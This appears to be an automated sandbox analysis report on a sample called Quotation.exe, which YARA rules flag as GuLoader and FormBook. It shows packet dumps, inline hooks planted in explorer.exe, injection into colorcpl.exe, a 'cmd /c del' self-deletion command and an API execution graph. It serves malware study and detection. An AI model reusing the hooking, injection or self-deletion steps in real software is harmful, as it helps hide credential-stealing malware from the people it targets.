                                                            Nov 12, 2024 07:35:47.375107050 CET212INData Raw: fd a1 31 cf 30 f3 11 b9 60 e0 dc 5e 3c ac 28 13 71 8a d4 6c 40 43 b9 66 69 d2 9b e3 2c 91 2a c8 18 b0 1c 24 d2 38 95 a4 5d 2b 36 47 c5 20 33 73 07 09 9a f9 b9 11 8b d5 6c fc 0f a4 09 90 11 2f 68 c2 8e 64 40 dc aa 41 fc a6 3f c0 e0 88 85 d0 d7 3f
                                                            Data Ascii: 10`^<(ql@Cfi,*$8]+6G 3sl/hd@A??dJW@"_p}KSd*zmV}s&eN1gi-/$QP5J}e1Lb377Nai/q?
                                                            Nov 12, 2024 07:35:47.513184071 CET1236INData Raw: f5 2d e7 e3 b8 19 dd e0 b4 34 05 b0 52 c6 91 e8 c9 2e f0 ec ad e1 52 36 5d bc 40 63 9c ec 50 e3 c3 0a 04 d5 37 dc 76 be 20 98 18 a1 e2 1a 9a 7d 3c 65 c5 e7 57 af 02 b6 58 20 b0 da d9 88 32 25 0f a4 b0 d2 36 cf e8 21 fb fc ac f2 40 71 2c 96 81 9e
                                                            Data Ascii: -4R.R6]@cP7v }<eWX 2%6!@q,#Pj'Sx4wmFjudk$X3w[5?MO>C9@X)(C]yN#4y>g,dMyjA5)j]{me9|4XINK,WTG[1a;
                                                            Nov 12, 2024 07:35:47.513199091 CET1236INData Raw: 7a 9a 29 30 da 6a 18 5b bb 29 3b fe 72 ce 75 15 ea c7 2a 7d 22 c2 2b f4 c6 b6 3c 01 30 21 ea 8d b3 41 e8 32 e1 bc b0 0b 8b e3 00 10 16 7b 08 e9 d1 bb d5 4c 25 0d d8 9c 2a 6e 3d d0 e5 ee d9 08 52 02 2a fc 77 35 d6 b2 4b 79 e5 04 f9 61 9a 50 4d 4d
                                                            Data Ascii: z)0j[);ru*}"+<0!A2{L%*n=R*w5KyaPMM+te.Ug[""~[e0Fi/UgtPDC~+"q00g+7'(^!$j,;7b)\&90G(bdqQ5HH
                                                            Nov 12, 2024 07:35:47.513210058 CET424INData Raw: 2a 60 41 5f 83 d6 c4 fe 24 7d 5d 2c 48 61 cf 0c 96 d4 49 6e 61 ef 85 97 67 ee f9 11 ec 80 1e 2b f7 58 96 f9 f9 d2 a6 e4 6d 74 3d 39 c8 c3 f5 c2 04 bf 46 5f 31 93 69 07 03 be bd 1d 68 4a 74 98 d2 b0 93 30 d9 be f0 3a 66 07 01 dc f0 01 53 6e ba b8
                                                            Data Ascii: *`A_$}],HaInag+Xmt=9F_1ihJt0:fSn|6Of7$EDNV#@A=%,o^<\_Ex(DW].Le$KEi)Rjltlj9X?s{tt3O+!@}Z2TQ
                                                            Nov 12, 2024 07:35:47.513350964 CET1236INData Raw: 33 b4 55 17 ad c9 9c d1 df 2c ae e1 e1 e2 b7 3d 19 5b d1 0e b9 b3 65 91 e5 85 43 61 bc 03 0b e2 1a 40 69 b9 eb 32 2f 2f 75 84 87 b8 88 2a a4 fc 4a 7e 36 0f 1c d6 04 03 3f 79 ee c6 63 46 6c e1 81 15 36 e2 0a b5 25 21 83 02 0b dc e2 23 3b 71 79 12
                                                            Data Ascii: 3U,=[eCa@i2//u*J~6?ycFl6%!#;qypeFMswcI|J2`L.0|A=%2T.Kwa`LWuU3VatP=WW?/nC\XVEvpw


                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

                                                            Function NameHook TypeActive in Processes
                                                            PeekMessageAINLINEexplorer.exe
                                                            PeekMessageWINLINEexplorer.exe
                                                            GetMessageWINLINEexplorer.exe
                                                            GetMessageAINLINEexplorer.exe

                                                            Processes

                                                            Process: explorer.exe, Module: user32.dll
                                                            Function NameHook TypeNew Data
                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEA
                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEA
                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEA
                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEA

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:01:34:56
                                                            Start date:12/11/2024
                                                            Path:C:\Users\user\Desktop\Quotation.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                            Imagebase:0x400000
                                                            File size:690'000 bytes
                                                            MD5 hash:0A4E34CCC6E3E118F225A4F38F731A14
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2396223937.0000000006CC9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:01:35:36
                                                            Start date:12/11/2024
                                                            Path:C:\Users\user\Desktop\Quotation.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                            Imagebase:0x400000
                                                            File size:690'000 bytes
                                                            MD5 hash:0A4E34CCC6E3E118F225A4F38F731A14
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:01:35:49
                                                            Start date:12/11/2024
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff674740000
                                                            File size:5'141'208 bytes
                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:6
                                                            Start time:01:35:50
                                                            Start date:12/11/2024
                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\colorcpl.exe"
                                                            Imagebase:0xbc0000
                                                            File size:86'528 bytes
                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:7
                                                            Start time:01:35:55
                                                            Start date:12/11/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\user\Desktop\Quotation.exe"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:01:35:55
                                                            Start date:12/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:20.9%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:17.6%
                                                              Total number of Nodes:1604
                                                              Total number of Limit Nodes:44
                                                              execution_graph 5361 73422d43 5362 73422d5b 5361->5362 5363 7342162f 2 API calls 5362->5363 5364 73422d76 5363->5364 5365 402643 5366 402672 5365->5366 5367 402657 5365->5367 5368 4026a2 5366->5368 5369 402677 5366->5369 5370 402d89 21 API calls 5367->5370 5372 402dab 21 API calls 5368->5372 5371 402dab 21 API calls 5369->5371 5377 40265e 5370->5377 5373 40267e 5371->5373 5374 4026a9 lstrlenW 5372->5374 5382 406543 WideCharToMultiByte 5373->5382 5374->5377 5376 402692 lstrlenA 5376->5377 5378 4026d6 5377->5378 5380 4026ec 5377->5380 5381 4060f2 5 API calls 5377->5381 5379 4060c3 WriteFile 5378->5379 5378->5380 5379->5380 5381->5378 5382->5376 4308 401946 4309 401948 4308->4309 4310 402dab 21 API calls 4309->4310 4311 40194d 4310->4311 4314 405c2d 4311->4314 4353 405ef8 4314->4353 4317 405c55 DeleteFileW 4319 401956 4317->4319 4318 405c6c 4320 405d97 4318->4320 4367 406521 lstrcpynW 4318->4367 4320->4319 4325 40687e 2 API calls 4320->4325 4322 405c92 4323 405ca5 4322->4323 4324 405c98 lstrcatW 4322->4324 4368 405e3c lstrlenW 4323->4368 4326 405cab 4324->4326 4329 405db1 4325->4329 4328 405cbb lstrcatW 4326->4328 4330 405cc6 lstrlenW FindFirstFileW 4326->4330 4328->4330 4329->4319 4331 405db5 4329->4331 4332 405d8c 4330->4332 4351 405ce8 4330->4351 4385 405df0 lstrlenW CharPrevW 4331->4385 4332->4320 4335 405d6f FindNextFileW 4339 405d85 FindClose 4335->4339 4335->4351 4336 405be5 5 API calls 4338 405dc7 4336->4338 4340 405de1 4338->4340 4341 405dcb 4338->4341 4339->4332 4343 4055a6 28 API calls 4340->4343 4341->4319 4344 4055a6 28 API calls 4341->4344 4343->4319 4346 405dd8 4344->4346 4345 405c2d 64 API calls 4345->4351 4348 4062e1 40 API calls 4346->4348 4347 4055a6 28 API calls 4347->4335 4350 405ddf 4348->4350 4349 4055a6 28 API calls 4349->4351 4350->4319 4351->4335 4351->4345 4351->4347 4351->4349 4372 406521 lstrcpynW 4351->4372 4373 405be5 4351->4373 4381 4062e1 MoveFileExW 4351->4381 4388 406521 lstrcpynW 4353->4388 4355 405f09 4389 405e9b CharNextW CharNextW 4355->4389 4358 405c4d 4358->4317 4358->4318 4359 4067cf 5 API calls 4365 405f1f 4359->4365 4360 405f50 lstrlenW 4361 405f5b 4360->4361 4360->4365 4363 405df0 3 API calls 4361->4363 4362 40687e 2 API calls 4362->4365 4364 405f60 GetFileAttributesW 4363->4364 4364->4358 4365->4358 4365->4360 4365->4362 4366 405e3c 2 API calls 4365->4366 4366->4360 4367->4322 4369 405e4a 4368->4369 4370 405e50 CharPrevW 4369->4370 4371 405e5c 4369->4371 4370->4369 4370->4371 4371->4326 4372->4351 4395 405fec GetFileAttributesW 4373->4395 4376 405c12 4376->4351 4377 405c00 RemoveDirectoryW 4379 405c0e 4377->4379 4378 405c08 DeleteFileW 4378->4379 4379->4376 4380 405c1e SetFileAttributesW 4379->4380 4380->4376 4382 406302 4381->4382 4383 4062f5 4381->4383 4382->4351 4398 406167 4383->4398 4386 405dbb 4385->4386 4387 405e0c lstrcatW 4385->4387 4386->4336 4387->4386 4388->4355 4390 405eb8 4389->4390 4391 405eca 4389->4391 4390->4391 4392 405ec5 CharNextW 4390->4392 4393 405eee 4391->4393 4394 405e1d CharNextW 4391->4394 4392->4393 4393->4358 4393->4359 4394->4391 4396 405bf1 4395->4396 4397 405ffe SetFileAttributesW 4395->4397 4396->4376 4396->4377 4396->4378 4397->4396 4399 406197 4398->4399 4400 4061bd GetShortPathNameW 4398->4400 4425 406011 GetFileAttributesW CreateFileW 4399->4425 4402 4061d2 4400->4402 4403 4062dc 4400->4403 4402->4403 4404 4061da wsprintfA 4402->4404 4403->4382 4406 40655e 21 API calls 4404->4406 4405 4061a1 CloseHandle GetShortPathNameW 4405->4403 4407 4061b5 4405->4407 4408 406202 4406->4408 4407->4400 4407->4403 4426 406011 GetFileAttributesW CreateFileW 4408->4426 4410 40620f 4410->4403 4411 40621e GetFileSize GlobalAlloc 4410->4411 4412 406240 4411->4412 4413 4062d5 CloseHandle 4411->4413 4427 406094 ReadFile 4412->4427 4413->4403 4418 406273 4420 405f76 4 API calls 4418->4420 4419 40625f lstrcpyA 4421 406281 4419->4421 4420->4421 4422 4062b8 SetFilePointer 4421->4422 4434 4060c3 WriteFile 4422->4434 4425->4405 4426->4410 4428 4060b2 4427->4428 4428->4413 4429 405f76 lstrlenA 4428->4429 4430 405fb7 lstrlenA 4429->4430 4431 405f90 lstrcmpiA 4430->4431 4432 405fbf 4430->4432 4431->4432 4433 405fae CharNextA 4431->4433 4432->4418 4432->4419 4433->4430 4435 4060e1 GlobalFree 4434->4435 4435->4413 4436 4015c6 4437 402dab 21 API calls 4436->4437 4438 4015cd 4437->4438 4439 405e9b 4 API calls 4438->4439 4451 4015d6 4439->4451 4440 401636 4442 401668 4440->4442 4443 40163b 4440->4443 4441 405e1d CharNextW 4441->4451 4445 401423 28 API calls 4442->4445 4461 401423 4443->4461 4452 401660 4445->4452 4450 40164f SetCurrentDirectoryW 4450->4452 4451->4440 4451->4441 4453 40161c GetFileAttributesW 4451->4453 4455 405aec 4451->4455 4458 405a75 CreateDirectoryW 4451->4458 4465 405acf CreateDirectoryW 4451->4465 4453->4451 4456 406915 5 API calls 4455->4456 4457 405af3 4456->4457 4457->4451 4459 405ac5 GetLastError 4458->4459 4460 405ac1 4458->4460 4459->4460 4460->4451 4462 4055a6 28 API calls 4461->4462 4463 401431 4462->4463 4464 406521 lstrcpynW 4463->4464 4464->4450 4466 405ae3 GetLastError 4465->4466 4467 405adf 4465->4467 4466->4467 4467->4451 4468 401c48 4490 402d89 4468->4490 4470 401c4f 4471 402d89 21 API calls 4470->4471 4472 401c5c 4471->4472 4473 401c71 4472->4473 4475 402dab 21 API calls 4472->4475 4474 401c81 4473->4474 4476 402dab 21 API calls 4473->4476 4477 401cd8 4474->4477 4478 401c8c 4474->4478 4475->4473 4476->4474 4480 402dab 21 API calls 4477->4480 4479 402d89 21 API calls 4478->4479 4481 401c91 4479->4481 4482 401cdd 4480->4482 4483 402d89 21 API calls 4481->4483 4484 402dab 21 API calls 4482->4484 4486 401c9d 4483->4486 4485 401ce6 FindWindowExW 4484->4485 4489 401d08 4485->4489 4487 401cc8 SendMessageW 4486->4487 4488 401caa SendMessageTimeoutW 4486->4488 4487->4489 4488->4489 4491 40655e 21 API calls 4490->4491 4492 402d9e 4491->4492 4492->4470 5390 4028c9 5391 4028cf 5390->5391 5392 4028d7 FindClose 5391->5392 5393 402c2f 5391->5393 5392->5393 5394 40494a 5395 404980 5394->5395 5396 40495a 5394->5396 5398 404507 8 API calls 5395->5398 5397 4044a0 22 API calls 5396->5397 5399 404967 SetDlgItemTextW 5397->5399 5400 40498c 5398->5400 5399->5395 4493 4014cb 4494 4055a6 28 API calls 4493->4494 4495 4014d2 4494->4495 5401 4016d1 5402 402dab 21 API calls 5401->5402 5403 4016d7 GetFullPathNameW 5402->5403 5404 4016f1 5403->5404 5410 401713 5403->5410 5406 40687e 2 API calls 5404->5406 5404->5410 5405 401728 GetShortPathNameW 5407 402c2f 5405->5407 5408 401703 5406->5408 5408->5410 5411 406521 lstrcpynW 5408->5411 5410->5405 5410->5407 5411->5410 5412 401e53 GetDC 5413 402d89 21 API calls 5412->5413 5414 401e65 GetDeviceCaps MulDiv ReleaseDC 5413->5414 5415 402d89 21 API calls 5414->5415 5416 401e96 5415->5416 5417 40655e 21 API calls 5416->5417 5418 401ed3 CreateFontIndirectW 5417->5418 5419 40263d 5418->5419 5420 402955 5421 402dab 21 API calls 5420->5421 5422 402961 5421->5422 5423 402977 5422->5423 5424 402dab 21 API calls 5422->5424 5425 405fec 2 API calls 5423->5425 5424->5423 5426 40297d 5425->5426 5448 406011 GetFileAttributesW CreateFileW 5426->5448 5428 40298a 5429 402a40 5428->5429 5432 4029a5 GlobalAlloc 5428->5432 5433 402a28 5428->5433 5430 402a47 DeleteFileW 5429->5430 5431 402a5a 5429->5431 5430->5431 5432->5433 5435 4029be 5432->5435 5434 4032b9 39 API calls 5433->5434 5437 402a35 CloseHandle 5434->5437 5449 4034b4 SetFilePointer 5435->5449 5437->5429 5438 4029c4 5439 40349e ReadFile 5438->5439 5440 4029cd GlobalAlloc 5439->5440 5441 402a11 5440->5441 5442 4029dd 5440->5442 5444 4060c3 WriteFile 5441->5444 5443 4032b9 39 API calls 5442->5443 5445 4029ea 5443->5445 5446 402a1d GlobalFree 5444->5446 5447 402a08 GlobalFree 5445->5447 5446->5433 5447->5441 5448->5428 5449->5438 5450 4045d6 lstrcpynW lstrlenW 4572 4014d7 4573 402d89 21 API calls 4572->4573 4574 4014dd Sleep 4573->4574 4576 402c2f 4574->4576 5451 73421058 5453 73421074 5451->5453 5452 734210dd 5453->5452 5455 73421092 5453->5455 5464 734215b6 5453->5464 5456 734215b6 GlobalFree 5455->5456 5457 734210a2 5456->5457 5458 734210b2 5457->5458 5459 734210a9 GlobalSize 5457->5459 5460 734210b6 GlobalAlloc 5458->5460 5462 734210c7 5458->5462 5459->5458 5461 734215dd 3 API calls 5460->5461 5461->5462 5463 734210d2 GlobalFree 5462->5463 5463->5452 5466 734215bc 5464->5466 5465 734215c2 5465->5455 5466->5465 5467 734215ce GlobalFree 5466->5467 5467->5455 5468 40195b 5469 402dab 21 API calls 5468->5469 5470 401962 lstrlenW 5469->5470 5471 40263d 5470->5471 4577 4020dd 4578 4021a1 4577->4578 4579 4020ef 4577->4579 4581 401423 28 API calls 4578->4581 4580 402dab 21 API calls 4579->4580 4582 4020f6 4580->4582 4587 4022fb 4581->4587 4583 402dab 21 API calls 4582->4583 4584 4020ff 4583->4584 4585 402115 LoadLibraryExW 4584->4585 4586 402107 GetModuleHandleW 4584->4586 4585->4578 4588 402126 4585->4588 4586->4585 4586->4588 4600 406984 4588->4600 4591 402170 4593 4055a6 28 API calls 4591->4593 4592 402137 4594 402156 4592->4594 4595 40213f 4592->4595 4597 402147 4593->4597 4605 73421817 4594->4605 4596 401423 28 API calls 4595->4596 4596->4597 4597->4587 4598 402193 FreeLibrary 4597->4598 4598->4587 4647 406543 WideCharToMultiByte 4600->4647 4602 4069a1 4603 4069a8 GetProcAddress 4602->4603 4604 402131 4602->4604 4603->4604 4604->4591 4604->4592 4606 7342184a 4605->4606 4648 73421bff 4606->4648 4608 73421851 4609 73421976 4608->4609 4610 73421862 4608->4610 4611 73421869 4608->4611 4609->4597 4698 7342243e 4610->4698 4682 73422480 4611->4682 4616 734218af 4711 73422655 4616->4711 4617 734218cd 4622 734218d3 4617->4622 4623 7342191e 4617->4623 4618 73421898 4633 7342188e 4618->4633 4708 73422e23 4618->4708 4619 7342187f 4621 73421885 4619->4621 4626 73421890 4619->4626 4621->4633 4692 73422b98 4621->4692 4730 73421666 4622->4730 4624 73422655 10 API calls 4623->4624 4634 7342190f 4624->4634 4625 734218b5 4722 73421654 4625->4722 4702 73422810 4626->4702 4633->4616 4633->4617 4638 73421965 4634->4638 4736 73422618 4634->4736 4636 73421896 4636->4633 4637 73422655 10 API calls 4637->4634 4638->4609 4642 7342196f GlobalFree 4638->4642 4642->4609 4644 73421951 4644->4638 4740 734215dd wsprintfW 4644->4740 4645 7342194a FreeLibrary 4645->4644 4647->4602 4743 734212bb GlobalAlloc 4648->4743 4650 73421c26 4744 734212bb GlobalAlloc 4650->4744 4652 73421e6b GlobalFree GlobalFree GlobalFree 4654 73421e88 4652->4654 4659 73421ed2 4652->4659 4653 73421c31 4653->4652 4657 73421d26 GlobalAlloc 4653->4657 4653->4659 4660 73421d8f GlobalFree 4653->4660 4663 73421d71 lstrcpyW 4653->4663 4664 73421d7b lstrcpyW 4653->4664 4667 73422126 4653->4667 4673 73422067 GlobalFree 4653->4673 4674 734221ae 4653->4674 4675 734212cc 2 API calls 4653->4675 4676 73421dcd 4653->4676 4655 7342227e 4654->4655 4656 73421e9d 4654->4656 4654->4659 4658 734222a0 GetModuleHandleW 4655->4658 4655->4659 4656->4659 4747 734212cc 4656->4747 4657->4653 4661 734222b1 LoadLibraryW 4658->4661 4662 734222c6 4658->4662 4659->4608 4660->4653 4661->4659 4661->4662 4751 734216bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4662->4751 4663->4664 4664->4653 4666 73422318 4666->4659 4670 73422325 lstrlenW 4666->4670 4750 734212bb GlobalAlloc 4667->4750 4752 734216bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4670->4752 4671 734222d8 4671->4666 4680 73422302 GetProcAddress 4671->4680 4673->4653 4674->4659 4679 73422216 lstrcpyW 4674->4679 4675->4653 4676->4653 4745 7342162f GlobalSize GlobalAlloc 4676->4745 4677 7342233f 4677->4659 4679->4659 4680->4666 4681 7342212f 4681->4608 4689 73422498 4682->4689 4684 734225c1 GlobalFree 4687 7342186f 4684->4687 4684->4689 4685 73422540 GlobalAlloc WideCharToMultiByte 4685->4684 4686 7342256b GlobalAlloc CLSIDFromString 4686->4684 4687->4618 4687->4619 4687->4633 4688 734212cc GlobalAlloc lstrcpynW 4688->4689 4689->4684 4689->4685 4689->4686 4689->4688 4691 7342258a 4689->4691 4754 7342135a 4689->4754 4691->4684 4758 734227a4 4691->4758 4694 73422baa 4692->4694 4693 73422c4f EnumWindows 4697 73422c6d 4693->4697 4694->4693 4696 73422d39 4696->4633 4761 73422b42 4697->4761 4699 73422453 4698->4699 4700 73421868 4699->4700 4701 7342245e GlobalAlloc 4699->4701 4700->4611 4701->4699 4706 73422840 4702->4706 4703 734228db GlobalAlloc 4707 734228fe 4703->4707 4704 734228ee 4705 734228f4 GlobalSize 4704->4705 4704->4707 4705->4707 4706->4703 4706->4704 4707->4636 4709 73422e2e 4708->4709 4710 73422e6e GlobalFree 4709->4710 4765 734212bb GlobalAlloc 4711->4765 4713 734226fa StringFromGUID2 4718 7342265f 4713->4718 4714 7342270b lstrcpynW 4714->4718 4715 734226d8 MultiByteToWideChar 4715->4718 4716 73422742 GlobalFree 4716->4718 4717 7342271e wsprintfW 4717->4718 4718->4713 4718->4714 4718->4715 4718->4716 4718->4717 4719 73422777 GlobalFree 4718->4719 4720 73421312 2 API calls 4718->4720 4766 73421381 4718->4766 4719->4625 4720->4718 4770 734212bb GlobalAlloc 4722->4770 4724 73421659 4725 73421666 2 API calls 4724->4725 4726 73421663 4725->4726 4727 73421312 4726->4727 4728 73421355 GlobalFree 4727->4728 4729 7342131b GlobalAlloc lstrcpynW 4727->4729 4728->4634 4729->4728 4731 73421672 wsprintfW 4730->4731 4732 7342169f lstrcpyW 4730->4732 4735 734216b8 4731->4735 4732->4735 4735->4637 4737 73422626 4736->4737 4738 73421931 4736->4738 4737->4738 4739 73422642 GlobalFree 4737->4739 4738->4644 4738->4645 4739->4737 4741 73421312 2 API calls 4740->4741 4742 734215fe 4741->4742 4742->4638 4743->4650 4744->4653 4746 7342164d 4745->4746 4746->4676 4753 734212bb GlobalAlloc 4747->4753 4749 734212db lstrcpynW 4749->4659 4750->4681 4751->4671 4752->4677 4753->4749 4755 73421361 4754->4755 4756 734212cc 2 API calls 4755->4756 4757 7342137f 4756->4757 4757->4689 4759 734227b2 VirtualAlloc 4758->4759 4760 73422808 4758->4760 4759->4760 4760->4691 4762 73422b4d 4761->4762 4763 73422b52 GetLastError 4762->4763 4764 73422b5d 4762->4764 4763->4764 4764->4696 4765->4718 4767 7342138a 4766->4767 4768 734213ac 4766->4768 4767->4768 4769 73421390 lstrcpyW 4767->4769 4768->4718 4769->4768 4770->4724 5472 402b5e 5473 402bb0 5472->5473 5474 402b65 5472->5474 5475 406915 5 API calls 5473->5475 5476 402d89 21 API calls 5474->5476 5479 402bae 5474->5479 5477 402bb7 5475->5477 5478 402b73 5476->5478 5480 402dab 21 API calls 5477->5480 5481 402d89 21 API calls 5478->5481 5482 402bc0 5480->5482 5485 402b7f 5481->5485 5482->5479 5483 402bc4 IIDFromString 5482->5483 5483->5479 5484 402bd3 5483->5484 5484->5479 5490 406521 lstrcpynW 5484->5490 5489 406468 wsprintfW 5485->5489 5487 402bf0 CoTaskMemFree 5487->5479 5489->5479 5490->5487 5498 40465f 5499 404791 5498->5499 5500 404677 5498->5500 5501 4047fb 5499->5501 5502 4048c5 5499->5502 5509 4047cc GetDlgItem SendMessageW 5499->5509 5504 4044a0 22 API calls 5500->5504 5501->5502 5503 404805 GetDlgItem 5501->5503 5506 404507 8 API calls 5502->5506 5507 40481f 5503->5507 5508 404886 5503->5508 5505 4046de 5504->5505 5511 4044a0 22 API calls 5505->5511 5512 4048c0 5506->5512 5507->5508 5513 404845 SendMessageW LoadCursorW SetCursor 5507->5513 5508->5502 5514 404898 5508->5514 5531 4044c2 KiUserCallbackDispatcher 5509->5531 5516 4046eb CheckDlgButton 5511->5516 5535 40490e 5513->5535 5518 4048ae 5514->5518 5519 40489e SendMessageW 5514->5519 5515 4047f6 5532 4048ea 5515->5532 5529 4044c2 KiUserCallbackDispatcher 5516->5529 5518->5512 5523 4048b4 SendMessageW 5518->5523 5519->5518 5523->5512 5524 404709 